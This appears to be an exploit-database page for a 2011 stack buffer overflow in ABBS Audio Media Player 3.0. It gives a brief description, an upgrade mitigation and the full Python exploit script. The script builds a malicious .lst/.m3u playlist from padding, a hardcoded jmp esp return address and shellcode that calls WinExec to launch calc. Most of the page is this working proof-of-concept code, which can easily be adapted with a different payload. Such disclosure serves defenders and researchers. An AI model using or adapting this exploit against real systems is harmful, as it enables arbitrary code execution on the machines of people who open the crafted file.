header-logo
Suggest Exploit
vendor:
ABBS Audio Media Player
by:
Rh0
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: ABBS Audio Media Player
Affected Version From: 3
Affected Version To: 3
Patch Exists: YES
Related CWE: N/A
CPE: a:abbs:abbs_audio_media_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Pro SP3 EN (VirtualBox)
2011

ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)

ABBS Audio Media Player 3.0 is vulnerable to a stack buffer overflow. The vulnerability is triggered when a specially crafted .m3u or .lst file is opened. The exploit code creates a file named exploit.lst which contains a buffer of 4108 bytes followed by a return address and a jump backwards 4116 bytes. The return address points to a jmp esp instruction located at user32.dll. The shellcode is a WinExec call to calc.exe.

Mitigation:

Upgrade to the latest version of ABBS Audio Media Player.
Source

Exploit-DB raw data:

# Exploit: ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)
# Date: 14.03.11
# Author: Rh0 (Rh0[at]z1p.biz)
# Software Link: http://abbs.qsnx.net/downloads/abbs-amp.zip
# Version: 3.0
# Tested on: WinXP Pro SP3 EN (VirtualBox)

print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0 [*]"
bufferlen = 4108;				# buffer until return address overwrite
nops = "\x90" * 5;
## WinExec("calc",1)
shellcode = (
		"\x33\xC0"			# xor eax,eax
		"\x50"				# push eax
		"\x68\x63\x61\x6C\x63"		# push 'calc'
		"\x8B\xDC"			# mov ebx, esp
		"\xB0\x01"			# mov al, 1
		"\x50"				# push eax
		"\x53"				# push ebx
		"\xB8\x0C\x25\x86\x7C"		# mov eax, 7C86250C
		"\x04\x01"			# add al, 1
		"\xFF\xD0"			# call eax (WinExec@kernel32.dll)
		)
			
ret = "\x87\xa7\xa7\x7c";			# jmp esp @user32.dll (0x7ca7a787)
esp = "\xe9\xeb\xef\xff\xff";	# jmp backwards 4116 bytes

buffer  = nops
buffer += shellcode
buffer += "A" * (bufferlen - len(buffer))
buffer += ret;
buffer += esp;

try:
	A = open("exploit.lst","wb")		# exploit works also with .m3u
	A.write(buffer)
	A.close()
	print "[*] exploit.lst created [*]"
except:
	print "[*] Error while creating file [*]"

print "[*] Enter to continue.. [*]"
raw_input()

Navigation

Suggest Exploit

Services By CQR